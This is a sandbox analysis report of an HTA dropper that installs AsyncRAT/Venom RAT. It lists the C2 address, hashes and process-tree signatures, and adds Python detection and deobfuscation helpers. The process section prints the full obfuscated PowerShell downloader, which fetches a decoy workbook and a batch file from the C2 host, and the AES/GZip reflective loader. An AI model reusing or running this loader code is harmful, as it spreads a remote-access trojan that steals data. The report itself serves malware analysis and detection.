Analysis

max time kernel: 100s
max time network: 143s
platform: windows10-2004_x64
resource: win10v2004-20240412-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
submitted: 17-04-2024 01:20

Static task: static1
Behavioral task: behavioral1
Sample: 44e910d573342c0bd7713e853d6bffec6565db309e4e93042052f064b5626384.hta
Resource: win7-20240215-en

General

Target: 44e910d573342c0bd7713e853d6bffec6565db309e4e93042052f064b5626384.hta
Size: 13KB
MD5: 9f587ac1e364bc4b89ea9991c780b09a
SHA1: 9612509e53fde418c7bb1794ac5f30c894b960a9
SHA256: 44e910d573342c0bd7713e853d6bffec6565db309e4e93042052f064b5626384
SHA512: bcc6c0e3a765cc57fb2d75b5761175d3608befacb5d1b2d478d6e2ddcfa415b0afdf93299ecaff18c6d2de3b135f1ab6b2b2670f20668e3df73c2b679610feb3
SSDEEP: 384:qpzWNjCBvB7owyK5GYsx5GlUi5GhmPM5GmmaUi5Gt48FR:scYZkYK0qmPM9mYl83
Malware Config

Extracted
Family: asyncrat
Version: Venom RAT + HVNC + Stealer + Grabber v6.0.3
Botnet: Default
C2: 194.48.251.169:4449
Mutex: wmdekgrrot
delay: 1
install: false
install_folder: %AppData%
Signatures

Async RAT payload (1 IoC)
  resource: behavioral2/memory/3424-121-0x0000000007C10000-0x0000000007C28000-memory.dmp
  yara_rule: family_asyncrat

Detects executables attempting to enumerate video devices using WMI (1 IoC)
  resource: behavioral2/memory/3424-121-0x0000000007C10000-0x0000000007C28000-memory.dmp
  yara_rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice

Blocklisted process makes network request (3 IoCs)
  flow 28  pid 4924  powershell.exe
  flow 31  pid 4924  powershell.exe
  flow 42  pid 3424  powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely for geofencing.
  Key value queried: \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation (mshta.exe)

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (EXCEL.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (EXCEL.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (EXCEL.EXE)

Enumerates system info in registry (2 TTPs, 3 IoCs)
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (EXCEL.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (EXCEL.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (EXCEL.EXE)

Modifies registry class (1 IoC)
  Key created: \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings (powershell.exe)

Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid 1888  EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (9 IoCs)
  pid 4924  powershell.exe (2 entries)
  pid 3424  powershell.exe (5 entries)
  pid 5024  powershell.exe (2 entries)

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Token: SeDebugPrivilege  pid 4924  powershell.exe
  Token: SeDebugPrivilege  pid 3424  powershell.exe
  Token: SeDebugPrivilege  pid 5024  powershell.exe

Suspicious use of SetWindowsHookEx (15 IoCs)
  pid 1888  EXCEL.EXE (14 entries)
  pid 3424  powershell.exe (1 entry)

Suspicious use of WriteProcessMemory (21 IoCs; each parent/child pair is logged three times)
  PID 2784 (mshta.exe) wrote to memory of 4924, procid_target 87
  PID 4924 (powershell.exe) wrote to memory of 1888, procid_target 92
  PID 4924 (powershell.exe) wrote to memory of 4424, procid_target 98
  PID 4424 (cmd.exe) wrote to memory of 3964, procid_target 100
  PID 3964 (cmd.exe) wrote to memory of 4276, procid_target 102
  PID 3964 (cmd.exe) wrote to memory of 3424, procid_target 103
  PID 3424 (powershell.exe) wrote to memory of 5024, procid_target 104
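The WriteProcessMemory pairs above give the whole launch chain: mshta.exe (2784) spawns powershell.exe (4924), which opens the decoy workbook in EXCEL.EXE (1888) and runs the batch file through two cmd.exe layers (4424, 3964) before a bare powershell.exe (3424) and a hidden-window powershell.exe (5024) appear. The decoy keeps Excel in the tree, which is where the processor/BIOS registry reads and the hook signatures come from. The Python below is an added example and not part of the sandbox report: it models process-creation events on that chain (constructed data; the explorer.exe root at PID 1000 is assumed, and long command lines are abridged) and applies four lineage-aware rules of the kind a Sigma rule over Sysmon event ID 1 would express. The rule names are arbitrary labels chosen here.

```python
"""
Process-tree detection logic for the launch chain recorded above:
mshta.exe (2784) -> powershell.exe (4924) -> cmd.exe (4424) -> cmd.exe (3964)
-> powershell.exe (3424) -> powershell.exe (5024), plus EXCEL.EXE (1888) and
cmd.exe (4276). Added example, not part of the sandbox report.
"""
import re

# Constructed process-creation events modelled on the report's process tree.
# The explorer.exe root (PID 1000) is an assumed parent the report does not
# show; long command lines are abridged with "...".
EVENTS = [
    {"pid": 1000, "ppid": 0, "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 2784, "ppid": 1000, "image": "mshta.exe",
     "cmd": r'C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\44e910d573342c0bd7713e853d6bffec6565db309e4e93042052f064b5626384.hta"'},
    {"pid": 4924, "ppid": 2784, "image": "powershell.exe",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function ekAviDgm($SBAMeJuWZ, $CZAXshoWnad){...}'},
    {"pid": 1888, "ppid": 4924, "image": "EXCEL.EXE",
     "cmd": r'"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\PurchaseDB.xlsx"'},
    {"pid": 4424, "ppid": 4924, "image": "cmd.exe",
     "cmd": r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\gogis.bat" "'},
    {"pid": 3964, "ppid": 4424, "image": "cmd.exe",
     "cmd": r'C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\gogis.bat"'},
    {"pid": 4276, "ppid": 3964, "image": "cmd.exe",
     "cmd": r'''C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\gogis.bat';powershell -w hidden;... "'''},
    {"pid": 3424, "ppid": 3964, "image": "powershell.exe",
     "cmd": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"pid": 5024, "ppid": 3424, "image": "powershell.exe",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden'},
]

# Parents that should rarely have an interpreter with these flags beneath them.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe",
                "winword.exe", "excel.exe", "outlook.exe"}
HIDDEN_WINDOW = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b")
EXEC_POLICY = re.compile(r"(?i)-(?:ex|ep|executionpolicy)\s+(?:bypass|unrestricted)\b")
USER_SCRIPT = re.compile(r'(?i)\\appdata\\(?:roaming|local)\\[^"]*\.(?:bat|cmd|ps1|vbs|js)\b')


def build_tree(events):
    """Index events by pid."""
    return {e["pid"]: e for e in events}


def ancestors(tree, pid):
    """Lower-cased images of every ancestor of pid, nearest first; cycle-safe."""
    out, seen, cur = [], {pid}, tree.get(pid)
    while cur and cur["ppid"] in tree and cur["ppid"] not in seen:
        cur = tree[cur["ppid"]]
        seen.add(cur["pid"])
        out.append(cur["image"].lower())
    return out


def detect(events):
    """Return (pid, rule) hits for the HTA -> PowerShell -> batch -> hidden PowerShell chain."""
    tree = build_tree(events)
    hits = []
    for e in events:
        image = e["image"].lower()
        lineage = ancestors(tree, e["pid"])
        parent = lineage[0] if lineage else ""
        under_host = bool(set(lineage) & SCRIPT_HOSTS)
        # Direct parent check: mshta.exe launching PowerShell at all.
        if image == "powershell.exe" and parent == "mshta.exe":
            hits.append((e["pid"], "mshta_spawns_powershell"))
        # Execution-policy override anywhere beneath a script/Office host.
        if image == "powershell.exe" and under_host and EXEC_POLICY.search(e["cmd"]):
            hits.append((e["pid"], "execpolicy_override_under_script_host"))
        # cmd.exe running a script dropped under %AppData% with mshta.exe in its ancestry.
        if image == "cmd.exe" and "mshta.exe" in lineage and USER_SCRIPT.search(e["cmd"]):
            hits.append((e["pid"], "appdata_script_under_mshta"))
        # Hidden-window PowerShell several hops below the script host.
        if image == "powershell.exe" and under_host and HIDDEN_WINDOW.search(e["cmd"]):
            hits.append((e["pid"], "hidden_powershell_under_script_host"))
    return hits


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(f"{pid}\t{rule}")
```

The rules walk the full ancestry rather than only the direct parent because the hidden-window powershell.exe (5024) is five hops below mshta.exe, behind two cmd.exe layers and a bare powershell.exe; a parent-only rule would fire on 4924 and nothing else. The "-w hidden" text that cmd.exe 4276 echoes is not matched, since that rule only considers powershell.exe images.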
Processes

[1] C:\Windows\SysWOW64\mshta.exe (PID 2784)
    Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\44e910d573342c0bd7713e853d6bffec6565db309e4e93042052f064b5626384.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4924)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function ekAviDgm($SBAMeJuWZ, $CZAXshoWnad){[IO.File]::WriteAllBytes($SBAMeJuWZ, $CZAXshoWnad)};function qHQDgYXJPBUhEu($SBAMeJuWZ){if($SBAMeJuWZ.EndsWith((NPsijwhhOlDHomDMYu @(42911,42965,42973,42973))) -eq $True){rundll32.exe $SBAMeJuWZ }elseif($SBAMeJuWZ.EndsWith((NPsijwhhOlDHomDMYu @(42911,42977,42980,42914))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $SBAMeJuWZ}elseif($SBAMeJuWZ.EndsWith((NPsijwhhOlDHomDMYu @(42911,42974,42980,42970))) -eq $True){misexec /qn /i $SBAMeJuWZ}else{Start-Process $SBAMeJuWZ}};function cCwKlxfFlkHXisv($cfRvnDevIseAZkkGCdZE){$ByCevDdKwarCKLMHmQl = New-Object (NPsijwhhOlDHomDMYu @(42943,42966,42981,42911,42952,42966,42963,42932,42973,42970,42966,42975,42981));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$CZAXshoWnad = $ByCevDdKwarCKLMHmQl.DownloadData($cfRvnDevIseAZkkGCdZE);return $CZAXshoWnad};function NPsijwhhOlDHomDMYu($ryHnSGx){$GVAeEuIntdcnz=42865;$kZTyiBcpN=$Null;foreach($YdUlriGuLkXxwHJSV in $ryHnSGx){$kZTyiBcpN+=[char]($YdUlriGuLkXxwHJSV-$GVAeEuIntdcnz)};return $kZTyiBcpN};function wtXSieyRAReJE(){$QeIsxXKSCag = $env:AppData + '\';$KPbdZNmFeRGIPHxzICPT = $QeIsxXKSCag + 'PurchaseDB.xlsx';If(Test-Path -Path $KPbdZNmFeRGIPHxzICPT){Invoke-Item $KPbdZNmFeRGIPHxzICPT;}Else{ $HXoxLKEOLYWMiHWXK = cCwKlxfFlkHXisv (NPsijwhhOlDHomDMYu @(42969,42981,42981,42977,42923,42912,42912,42914,42922,42917,42911,42917,42921,42911,42915,42918,42914,42911,42914,42919,42922,42923,42920,42915,42921,42920,42912,42945,42982,42979,42964,42969,42962,42980,42966,42933,42931,42911,42985,42973,42980,42985));ekAviDgm $KPbdZNmFeRGIPHxzICPT $HXoxLKEOLYWMiHWXK;Invoke-Item $KPbdZNmFeRGIPHxzICPT;};$GLzOZefB = $QeIsxXKSCag + 'gogis.bat'; if (Test-Path -Path $GLzOZefB){qHQDgYXJPBUhEu $GLzOZefB;}Else{ $PmRVpFoXv = cCwKlxfFlkHXisv (NPsijwhhOlDHomDMYu @(42969,42981,42981,42977,42923,42912,42912,42914,42922,42917,42911,42917,42921,42911,42915,42918,42914,42911,42914,42919,42922,42923,42920,42915,42921,42920,42912,42968,42976,42968,42970,42980,42911,42963,42962,42981));ekAviDgm $GLzOZefB $PmRVpFoXv;qHQDgYXJPBUhEu $GLzOZefB;};;;;}wtXSieyRAReJE;
      - Blocklisted process makes network request
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [3] C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (PID 1888)
        Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\PurchaseDB.xlsx"
        - Checks processor information in registry
        - Enumerates system info in registry
        - Suspicious behavior: AddClipboardFormatListener
        - Suspicious use of SetWindowsHookEx

    [3] C:\Windows\SysWOW64\cmd.exe (PID 4424)
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\gogis.bat" "
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\cmd.exe (PID 3964)
          Command line: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\gogis.bat"
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\SysWOW64\cmd.exe (PID 4276)
            Command line: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\gogis.bat';$XgWC='CJCPqopJCPqyToJCPq'.Replace('JCPq', ''),'DeKEVccoKEVcmKEVcpKEVcreKEVcsKEVcsKEVc'.Replace('KEVc', ''),'GeAJwHtCAJwHurrAJwHeAJwHntAJwHProAJwHceAJwHssAJwH'.Replace('AJwH', ''),'CGqtVreGqtVateGqtVDGqtVecrGqtVypGqtVtoGqtVrGqtV'.Replace('GqtV', ''),'TrashffnsfshfforshffmshffFinshffashfflBlshffocshffkshff'.Replace('shff', ''),'LoaAcuudAcuu'.Replace('Acuu', ''),'EnPhDKtPhDKrPhDKyPoPhDKiPhDKntPhDK'.Replace('PhDK', ''),'InvjPegokejPeg'.Replace('jPeg', ''),'ChBNFcangBNFceEBNFcxtBNFcenBNFcsBNFciBNFconBNFc'.Replace('BNFc', ''),'MamJZeimJZenmJZeMomJZedumJZelemJZe'.Replace('mJZe', ''),'SDiPVplDiPViDiPVtDiPV'.Replace('DiPV', ''),'ReZkbLadLZkbLinZkbLeZkbLsZkbL'.Replace('ZkbL', ''),'FBIJjrBIJjomBBIJjaBIJjseBIJj64BIJjStrBIJjiBIJjngBIJj'.Replace('BIJj', ''),'EleFaTTmeFaTTnFaTTtAFaTTtFaTT'.Replace('FaTT', '');powershell -w hidden;function nHhmY($bfNRC){$Wqjzg=[System.Security.Cryptography.Aes]::Create();$Wqjzg.Mode=[System.Security.Cryptography.CipherMode]::CBC;$Wqjzg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$Wqjzg.Key=[System.Convert]::($XgWC[12])('0/mNfjofNmhTDWKM5pVXBX9kZTvZAJfnb+xHxm0CsMs=');$Wqjzg.IV=[System.Convert]::($XgWC[12])('mimfsJsCvsdSCjq6OJjGsw==');$mEsqN=$Wqjzg.($XgWC[3])();$cIvUt=$mEsqN.($XgWC[4])($bfNRC,0,$bfNRC.Length);$mEsqN.Dispose();$Wqjzg.Dispose();$cIvUt;}function Jxpsl($bfNRC){$DhsxW=New-Object System.IO.MemoryStream(,$bfNRC);$abuYQ=New-Object System.IO.MemoryStream;$hMgwC=New-Object System.IO.Compression.GZipStream($DhsxW,[IO.Compression.CompressionMode]::($XgWC[1]));$hMgwC.($XgWC[0])($abuYQ);$hMgwC.Dispose();$DhsxW.Dispose();$abuYQ.Dispose();$abuYQ.ToArray();}$vXkJe=[System.IO.File]::($XgWC[11])([Console]::Title);$JakZo=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 5).Substring(2))));$GFnOO=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 6).Substring(2))));[System.Reflection.Assembly]::($XgWC[5])([byte[]]$GFnOO).($XgWC[6]).($XgWC[7])($null,$null);[System.Reflection.Assembly]::($XgWC[5])([byte[]]$JakZo).($XgWC[6]).($XgWC[7])($null,$null); "

        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3424)
            Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            - Blocklisted process makes network request
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of SetWindowsHookEx
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 5024)
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
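Both PowerShell stages in the tree above can be read statically. The first stage (PID 4924) hides every string as an @( ... ) array of integers that the NPsijwhhOlDHomDMYu function turns back into characters by subtracting $GVAeEuIntdcnz (42865). The second stage, the script text that cmd.exe PID 4276 echoes for the sibling bare powershell.exe (PID 3424), builds a table $XgWC of .NET member names by inserting a junk token into each name and stripping it with .Replace(), then calls everything as $XgWC[n]. The Python below is an added example, not the sample's code and not output of the sandbox: it decodes both schemes and rewrites the indirect calls. The excerpts are copied from the captured command lines (abridged; the sample's own variable names are kept). The AES-CBC/GZip unpacking of the two assemblies the loader reads from lines 5 and 6 of gogis.bat is not reproduced here because the batch file's contents are not on this page.

```python
"""
Static deobfuscation of the two PowerShell stages in the process tree above.
Added example; not code from the sample, the sandbox or the report.
"""
import re

# ---- Stage 1: powershell.exe (PID 4924) launched by mshta.exe ---------------
# NPsijwhhOlDHomDMYu subtracts $GVAeEuIntdcnz (42865) from each integer in an
# @( ... ) array and joins the resulting characters.
STAGE1_OFFSET = 42865


def decode_offset_array(values, offset=STAGE1_OFFSET):
    """Reverse the per-character offset encoding used by stage 1."""
    return "".join(chr(v - offset) for v in values)


def extract_offset_arrays(script, offset=STAGE1_OFFSET):
    """Decode every @(int,int,...) literal in a stage-1 command line, in order."""
    decoded = []
    for m in re.finditer(r"@\(([\d,\s]+)\)", script):
        values = [int(v) for v in m.group(1).split(",") if v.strip()]
        decoded.append(decode_offset_array(values, offset))
    return decoded


# Abridged excerpt of the PID 4924 command line; arrays copied verbatim.
# "misexec" is the sample's own spelling, so its .msi branch would not run.
STAGE1_EXCERPT = (
    "if($SBAMeJuWZ.EndsWith((NPsijwhhOlDHomDMYu @(42911,42965,42973,42973))) -eq $True){rundll32.exe $SBAMeJuWZ }"
    "elseif($SBAMeJuWZ.EndsWith((NPsijwhhOlDHomDMYu @(42911,42977,42980,42914))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $SBAMeJuWZ}"
    "elseif($SBAMeJuWZ.EndsWith((NPsijwhhOlDHomDMYu @(42911,42974,42980,42970))) -eq $True){misexec /qn /i $SBAMeJuWZ};"
    "$ByCevDdKwarCKLMHmQl = New-Object (NPsijwhhOlDHomDMYu @(42943,42966,42981,42911,42952,42966,42963,42932,42973,42970,42966,42975,42981));"
    "$HXoxLKEOLYWMiHWXK = cCwKlxfFlkHXisv (NPsijwhhOlDHomDMYu @(42969,42981,42981,42977,42923,42912,42912,42914,42922,42917,42911,42917,42921,42911,42915,42918,42914,42911,42914,42919,42922,42923,42920,42915,42921,42920,42912,42945,42982,42979,42964,42969,42962,42980,42966,42933,42931,42911,42985,42973,42980,42985));"
    "$PmRVpFoXv = cCwKlxfFlkHXisv (NPsijwhhOlDHomDMYu @(42969,42981,42981,42977,42923,42912,42912,42914,42922,42917,42911,42917,42921,42911,42915,42918,42914,42911,42914,42919,42922,42923,42920,42915,42921,42920,42912,42968,42976,42968,42970,42980,42911,42963,42962,42981));"
)

# ---- Stage 2: script echoed by cmd.exe (PID 4276) for powershell.exe (3424) --
# Member names appear as 'junkified'.Replace('junk','') and are invoked through
# $XgWC[n], so the visible text never contains e.g. FromBase64String.
REPLACE_LITERAL = re.compile(r"'([^']*)'\.Replace\('([^']*)',\s*''\)")


def extract_replace_strings(script):
    """Recover the cleartext of every 'xxx'.Replace('junk','') expression, in order."""
    return [s.replace(junk, "") for s, junk in REPLACE_LITERAL.findall(script)]


def resolve_indexed_calls(script, names, var="$XgWC"):
    """Rewrite .($XgWC[n]) and ::($XgWC[n]) into the recovered member name."""
    pat = re.compile(r"(::|\.)\(" + re.escape(var) + r"\[(\d+)\]\)")
    return pat.sub(lambda m: m.group(1) + names[int(m.group(2))], script)


# The $XgWC table from the PID 4276 command line, copied verbatim.
STAGE2_TABLE = (
    "$XgWC='CJCPqopJCPqyToJCPq'.Replace('JCPq', ''),"
    "'DeKEVccoKEVcmKEVcpKEVcreKEVcsKEVcsKEVc'.Replace('KEVc', ''),"
    "'GeAJwHtCAJwHurrAJwHeAJwHntAJwHProAJwHceAJwHssAJwH'.Replace('AJwH', ''),"
    "'CGqtVreGqtVateGqtVDGqtVecrGqtVypGqtVtoGqtVrGqtV'.Replace('GqtV', ''),"
    "'TrashffnsfshfforshffmshffFinshffashfflBlshffocshffkshff'.Replace('shff', ''),"
    "'LoaAcuudAcuu'.Replace('Acuu', ''),"
    "'EnPhDKtPhDKrPhDKyPoPhDKiPhDKntPhDK'.Replace('PhDK', ''),"
    "'InvjPegokejPeg'.Replace('jPeg', ''),"
    "'ChBNFcangBNFceEBNFcxtBNFcenBNFcsBNFciBNFconBNFc'.Replace('BNFc', ''),"
    "'MamJZeimJZenmJZeMomJZedumJZelemJZe'.Replace('mJZe', ''),"
    "'SDiPVplDiPViDiPVtDiPV'.Replace('DiPV', ''),"
    "'ReZkbLadLZkbLinZkbLeZkbLsZkbL'.Replace('ZkbL', ''),"
    "'FBIJjrBIJjomBBIJjaBIJjseBIJj64BIJjStrBIJjiBIJjngBIJj'.Replace('BIJj', ''),"
    "'EleFaTTmeFaTTnFaTTtAFaTTtFaTT'.Replace('FaTT', '');"
)

# Abridged excerpt of the loader body that uses the table.
STAGE2_BODY = (
    "$Wqjzg.Key=[System.Convert]::($XgWC[12])('0/mNfjofNmhTDWKM5pVXBX9kZTvZAJfnb+xHxm0CsMs=');"
    "$mEsqN=$Wqjzg.($XgWC[3])();$cIvUt=$mEsqN.($XgWC[4])($bfNRC,0,$bfNRC.Length);"
    "$vXkJe=[System.IO.File]::($XgWC[11])([Console]::Title);"
    "[System.Reflection.Assembly]::($XgWC[5])([byte[]]$GFnOO).($XgWC[6]).($XgWC[7])($null,$null);"
)


def deobfuscate_sample():
    """Run both decoders over the excerpts and return the recovered artefacts."""
    stage1_strings = extract_offset_arrays(STAGE1_EXCERPT)
    names = extract_replace_strings(STAGE2_TABLE)
    readable_body = resolve_indexed_calls(STAGE2_BODY, names)
    return stage1_strings, names, readable_body


if __name__ == "__main__":
    strings, table, body = deobfuscate_sample()
    print("stage 1 strings:", strings)
    print("stage 2 member table:", table)
    print("stage 2 loader:", body)
```

The stage-1 arrays decode to the three extension checks, "Net.WebClient" and two download URLs on the same host as the extracted C2, 194.48.251.169, on port 7287 rather than 4449: the decoy PurchaseDB.xlsx and gogis.bat, matching the two files written under AppData\Roaming in the tree. The stage-2 table resolves to FromBase64String, CreateDecryptor, TransformFinalBlock, Decompress, Assembly.Load and EntryPoint.Invoke, i.e. base64-decode, AES-CBC-decrypt, gunzip and reflectively invoke two assemblies without touching disk, which is why the family_asyncrat YARA hit is on a memory dump of PID 3424 and not on a dropped file.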
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 2KB
MD5: 0774a05ce5ee4c1af7097353c9296c62
SHA1: 658ff96b111c21c39d7ad5f510fb72f9762114bb
SHA256: d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4
SHA512: 104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 229B
MD5: 78ed49954bb522710bac69df4bc869b6
SHA1: 0f6250a3c8d4b43d7028ee5a17e1fddcfeb14ae8
SHA256: 8f36ec6bd88d6051bac74858bcd571f65de59aa3c6275c66ec67b337d381b326
SHA512: dc3ae04c3627d672e4e41dfbcbf0d0fd45e8e7897c3b6340ca8ed3a460c91f994dce1531b9195a2093c12f1e295ca08b2786f2639323a56734853cdaf64b6213

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize: 872B
MD5: 74c37c9ba17b5662296c0bbca2e9b4a1
SHA1: 2ce04e0c12c9b183514e1e911f9a4d60802425eb
SHA256: eca3729f34d9207c38a25a64a820f47d0d0672c0db43fe0d372e7fa66001dc32
SHA512: 332bb8db1e76aa1bfeb6fcd4de72ac5584baef93176eee54b1706cbc0426063bd134f251f73c9ac618d15f31c0ec557b22a94c9f343e919ec3b0aa53d018fcb8

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize: 24B
MD5: 4fcb2a3ee025e4a10d21e1b154873fe2
SHA1: 57658e2fa594b7d0b99d02e041d0f3418e58856b
SHA256: 90bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228
SHA512: 4e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff

Filesize: 12KB
MD5: 05eb4338ab9bcd275b88d8f2f701fea8
SHA1: 409e23bd1603cb69b7511a497483011005b9fdaf
SHA256: b829611b9cb65f7baad3c897689d2c06cd457d294b072c48de79da471b986802
SHA512: 8f651aff4e2d6581913da2ab419213e71e1b88fa4cb7ab0853e5e0720308e4a4f86707d1aa1c457e3aed8046aba3647d7b8260472ddd6a34f7719f43a6855ced

Filesize: 6.9MB
MD5: a65e873839228c5b453d6effa5d14d16
SHA1: 40be429e0e6b41061f3291d10e720eaebf32eda1
SHA256: 59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951
SHA512: 84ec1da7d5f5fe236c7fbe960b69d99ae0b6d3fe83844cd2bf3128508d39ad1de35f17dcb101e06fb25b155a806885bb5d6d095fbf3e0a3c729c678fa200f850